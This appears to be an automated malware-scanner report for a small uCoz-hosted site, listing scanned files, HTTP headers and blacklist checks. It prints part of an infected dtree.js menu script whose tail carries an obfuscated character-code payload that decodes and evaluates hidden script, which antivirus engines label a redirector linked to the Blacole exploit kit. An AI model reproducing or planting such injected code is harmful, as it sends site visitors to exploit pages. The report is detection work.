New scan:

Malware Scanner report for cool-servers.my1.ru

Malicious/Suspicious/Total urls checked
1/0/8
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/7
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cool-servers.my1.ru/
200 OK
Content-Length: 140944
Content-Type: text/html
clean
http://cool-servers.my1.ru/css/dtree.js
200 OK
Content-Length: 13397
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Node(id, pid, name, url, title, target, icon, iconOpen, open) {
this.id = id;
this.pid = pid;
this.name = name;
this.url = url;
this.title = title;
this.target = target;
this.icon = icon;
this.iconOpen = iconOpen;
this._io = open || false;
this._is = false;
this._ls = false;
this._hc = false;
this._ai = 0;
this._p;
};
function dTree(objName, path) {
this.config = {
target: null,
folderLinks: tru
... 3304 bytes are skipped ...
$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-NS [Trj]
K7AntiVirus
Trojan ( e4e727470 )
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
Commtouch
JS/Redir.NZ

http://cool-servers.my1.ru/jquery.js
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://cool-servers.my1.ru/test404page.js
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://cool-servers.my1.ru/effects.core.js
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://s106.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s106.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s106.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cool-servers.my1.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Oct 2015 12:52:42 GMT
Pragma: no-cache
Server: nginx/1.8.0
Content-Type: text/html; charset=UTF-8
Set-Cookie: 5cool-serversuCoz=; path=/; expires=Sat, 26-Oct-2013 12:52:42 GMT; domain=.cool-servers.my1.ru;
Set-Cookie: 5cool-serversuzll=1445863962; path=/; expires=Tue, 25-Oct-2016 12:52:42 GMT; domain=.cool-servers.my1.ru;
Set-Cookie: 5cool-serversuCoz=; path=/; expires=Sat, 26-Oct-2013 12:52:42 GMT; domain=.cool-servers.my1.ru;
Set-Cookie: ucvid=tCjNJ2yl0c; domain=my1.ru; path=/; expires=Tue, 25-Oct-2016 12:52:42 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: cool-servers.my1.ru
Referer: http://www.google.com/search?q=cool-servers.my1.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cool-servers.my1.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cool-servers.my1.ru/

Result: cool-servers.my1.ru is not infected or malware details are not published yet.